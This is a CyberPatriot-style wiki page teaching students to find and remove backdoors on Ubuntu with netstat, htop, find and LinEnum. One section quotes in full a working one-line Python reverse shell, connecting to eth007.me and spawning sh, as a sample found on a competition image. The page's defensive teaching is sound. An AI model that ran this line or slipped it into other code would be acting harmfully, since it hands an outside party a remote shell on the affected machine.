Operating Systems/Linux/Ubuntu/Ubuntu 16.04 LTS/Malware-Backdoors

From Vista Ridge Cyberpatriot
Jump to navigation Jump to search

Backdoors[edit | edit source]

Netstat[edit | edit source]

Netstat lets you see which ports are being used by which programs. This is valuable because backdoors may be waiting for a remote hacker to connect to it on your computer.

  1. Install netstat with sudo apt install net-tools
  2. sudo netstat -tlnp to run netstat.
    • sudo is required so that you have the permission to the see which process is using each port
    • -t only shows processes using tcp, which is common for backdoors
    • -l only shows listening processes, which backdoors will most likely be doing
    • -n shows each process's address
    • -p displays the process's name
  3. If you find a process you don't recognize (cupsd and sshd are safe), first Google (or DuckDuckGo) the name to see if it seems like a regular linux thing or something related to the scoring software.
  4. If it seems potentially dangerous, use a program called htop to inspect it.
    • sudo apt install htop
    • htop
    • press '/' to start searching for a process, and type in the process name you're suspicious of.
    • the command column will tell you where the program or script is located on your computer. This may be useful if a forensics question asks you to locate a backdoor.
    • After any forensics question, try to stop the process if you're confidant that it's a malicious program. leave htop (ctrl-c) and run kill <process>. If you lose point, try to figure out how to start the process again (rebooting might work). If you don't lose points you can remove the program or script from the location found with htop, using sudo rm <program path>

Other Methods[edit | edit source]

Another way of looking for backdoors is looking for the script itself.

  1. One way is to search for scripts via file extensions, but there are many scripts that are used by the system, so this only works if you do it in a from a directory in that you know the default contents of, or if you compare the files with one of these extensions to the files with those extensions on a fresh Ubuntu installation. Also not that files in linux also don't have to have file extensions, so this could miss a script even if it's in the directory that you're looking in.
    • sudo find <dir> -name "*.py"
    • sudo find <dir> -name "*.sh"
  2. One area that could contain backdoors is /etc/init.d/ directory. This directory contains scripts that are run at boot, which is good for backdoors. This directory contains a lot of scripts, and it's take a while to sift through all of them. You could compare them to the scripts that are on a normal Ubuntu installation, or you can try to use a file's number of lines to detect if it's a backdoor. Backdoors are often really short, as in only a few lines, while most of the normal scripts are at least 50 lines. wc -l * prints out the number of lines in every file in the directory, and see if any files have a low amount of lines.

Inspect a Possible Backdoor[edit | edit source]

In case you do find a file that you suspect of being a backdoor, inspect its code using cat <file>. ChatGPT can usually tell you what a script does, and whether it's a backdoor. In case you want to figure it out yourself, here's an example of a python backdoor found on an image: import sys,socket,os,pty; s=socket.socket(); s.connect(('eth007.me',42023)); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn('sh') (it may or may not be compressed into one line like this one was). It's not important to understand exactly what it does, but notice that it's connecting to another IP address (which eth007.me represents), and that it spawns a shell, "sh" in this case but it could be "bash" instead. A forensics question might ask you for the IP address of the attacker. In this case the IP address wasn't stored plainly in the backdoor, instead the domain name was used, but the command nslookup <domain> prints out two adresses that it got in different ways. Try both.

Exploits[edit | edit source]

LinEnum[edit | edit source]

LinEnum is a useful program that collects a ton of information about a system that may be useful to hackers or cybersecurity people.

  1. Installation:
  2. Run it:
    • bash LinEnum/LinEnum.sh
  3. It will spit out a ton of information on things that may be useful to you. It's best to scroll through the whole thing yourself, but here are some especially important sections, in order from most to least important:
    • Can we read/write sensitive files: This shows the permissions of important files, such as ones that store passwords. In general they should have -rw-r--r-- permissions, except for /etc/shadow which should have -rw-r----- permissions. If they have different permissions, use sudo chmod 644 <file> (replace 644 with 640 if changing the /etc/shadow file)
    • Password and storage information: This displays how often passwords must change, the encryption method, and more. This should be changed with a script.
    • Path information: This shows the PATH environment variable, which determines which directory the commands you run come from. This should only include bin directories, like /usr/bin.
    • The USER/GROUP section is technically very useful, but those exploits should be fixed with a user script.
Retrieved from "https://cypat.rainbowunicorn.org/index.php?title=Operating_Systems/Linux/Ubuntu/Ubuntu_16.04_LTS/Malware-Backdoors&oldid=299"